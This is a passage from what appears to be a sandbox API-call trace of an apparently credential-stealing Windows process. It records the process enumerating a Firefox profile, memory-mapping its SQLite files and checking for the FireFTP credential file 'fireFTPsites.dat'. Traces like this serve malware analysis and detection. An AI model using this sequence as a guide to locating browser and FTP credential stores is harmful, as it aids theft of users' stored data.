returned 75 [0590.454] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.454] lstrlenW (lpString="extensions.sqlite") returned 17 [0590.454] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.454] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.454] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.454] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.454] CloseHandle (hObject=0x668) returned 1 [0590.455] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.455] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.455] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x2ed9860, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0590.455] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.455] CloseHandle (hObject=0x668) returned 1 [0590.455] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.455] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0590.455] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.455] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0590.457] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0590.459] CloseHandle (hObject=0x66c) returned 1 [0590.459] CloseHandle (hObject=0x668) returned 1 [0590.459] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.459] LocalFree (hMem=0x56cab0) returned 0x0 [0590.459] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.459] lstrlenW (lpString="\\") returned 1 [0590.459] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.459] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.459] lstrlenW (lpString="formhistory.sqlite") returned 18 [0590.459] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.459] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.459] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.459] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.459] CloseHandle (hObject=0x668) returned 1 [0590.459] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.460] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x2ed9860 [0590.460] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x2ed9860, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0590.460] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.460] CloseHandle (hObject=0x668) returned 1 [0590.460] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.460] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0590.460] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.460] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.461] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.462] CloseHandle (hObject=0x66c) returned 1 [0590.462] CloseHandle (hObject=0x668) returned 1 [0590.462] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.462] LocalFree (hMem=0x56cab0) returned 0x0 [0590.462] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.462] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0590.462] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0590.462] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.462] lstrlenW (lpString="\\") returned 1 [0590.462] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.462] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.462] lstrlenW (lpString="healthreport") returned 12 [0590.462] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.462] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.462] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.462] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.462] lstrlenW (lpString="\\*.*") returned 4 [0590.462] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.462] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.462] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.462] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.462] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.462] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.462] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.462] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.462] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.462] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.463] LocalFree (hMem=0x56cab0) returned 0x0 [0590.463] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.463] lstrlenW (lpString="\\") returned 1 [0590.463] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.463] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.463] lstrlenW (lpString="healthreport.sqlite") returned 19 [0590.463] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.463] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.463] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.463] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.463] CloseHandle (hObject=0x668) returned 1 [0590.463] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.463] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.463] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x2ed9860, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0590.463] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.463] CloseHandle (hObject=0x668) returned 1 [0590.463] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.463] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0590.463] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.463] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.473] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.474] CloseHandle (hObject=0x66c) returned 1 [0590.474] CloseHandle (hObject=0x668) returned 1 [0590.474] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.474] LocalFree (hMem=0x56cab0) returned 0x0 [0590.474] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.475] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0590.475] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.475] lstrlenW (lpString="\\") returned 1 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.475] lstrlenW (lpString="indexedDB") returned 9 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.475] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.475] lstrlenW (lpString="\\*.*") returned 4 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.475] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.475] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.475] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.475] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.475] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.475] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.475] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0590.475] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.475] lstrlenW (lpString="\\") returned 1 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.475] lstrlenW (lpString="moz-safe-about+home") returned 19 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x63f8c8 [0590.475] LocalFree (hMem=0x63bd28) returned 0x0 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.475] lstrlenW (lpString="\\*.*") returned 4 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fa28 [0590.475] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0x5b9b10 [0590.475] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.475] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.475] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.475] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.475] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.475] lstrlenW (lpString="\\") returned 1 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fb90 [0590.475] lstrlenW (lpString=".metadata") returned 9 [0590.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.475] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fcf0 [0590.475] LocalFree (hMem=0x63fb90) returned 0x0 [0590.476] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.476] CloseHandle (hObject=0x4e0) returned 1 [0590.476] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0590.476] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fe60 [0590.476] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x63fe60, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0590.476] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.476] CloseHandle (hObject=0x4e0) returned 1 [0590.476] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.476] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.476] CreateFileMappingW (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.476] CloseHandle (hObject=0x4e0) returned 1 [0590.476] LocalFree (hMem=0x63fe60) returned 0x0 [0590.476] StrStrIW (lpFirst=".metadata", lpSrch="fireFTPsites.dat") returned 0x0 [0590.476] LocalFree (hMem=0x63fcf0) returned 0x0 [0590.476] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.476] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0590.476] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.476] lstrlenW (lpString="\\") returned 1 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.476] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fb90 [0590.476] lstrlenW (lpString="idb") returned 3 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.476] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fcf0 [0590.476] LocalFree (hMem=0x63fb90) returned 0x0 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.476] lstrlenW (lpString="\\*.*") returned 4 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.476] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x63fe58 [0590.476] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d34c | out: lpFindFileData=0x52d34c) returned 0x5b9bd0 [0590.476] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.476] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d34c | out: lpFindFileData=0x52d34c) returned 1 [0590.476] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.476] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.476] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d34c | out: lpFindFileData=0x52d34c) returned 1 [0590.476] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0590.476] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0590.476] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.477] lstrlenW (lpString="\\") returned 1 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee1978 [0590.477] lstrlenW (lpString="818200132aebmoouht") returned 18 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x2ee1ae0 [0590.477] LocalFree (hMem=0x2ee1978) returned 0x0 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.477] lstrlenW (lpString="\\*.*") returned 4 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x2ee1c70 [0590.477] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d0d4 | out: lpFindFileData=0x52d0d4) returned 0x5b9b90 [0590.477] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.477] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d0d4 | out: lpFindFileData=0x52d0d4) returned 1 [0590.477] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.477] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.477] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d0d4 | out: lpFindFileData=0x52d0d4) returned 0 [0590.477] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0590.477] LocalFree (hMem=0x2ee1c70) returned 0x0 [0590.477] LocalFree (hMem=0x2ee1ae0) returned 0x0 [0590.477] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d34c | out: lpFindFileData=0x52d34c) returned 1 [0590.477] lstrlenW (lpString="\\") returned 1 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee1978 [0590.477] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0590.477] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ee1ae0 [0590.477] LocalFree (hMem=0x2ee1978) returned 0x0 [0590.477] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x670 [0590.477] CloseHandle (hObject=0x670) returned 1 [0590.477] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0590.477] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ee1c78 [0590.477] ExpandEnvironmentStringsW (in: 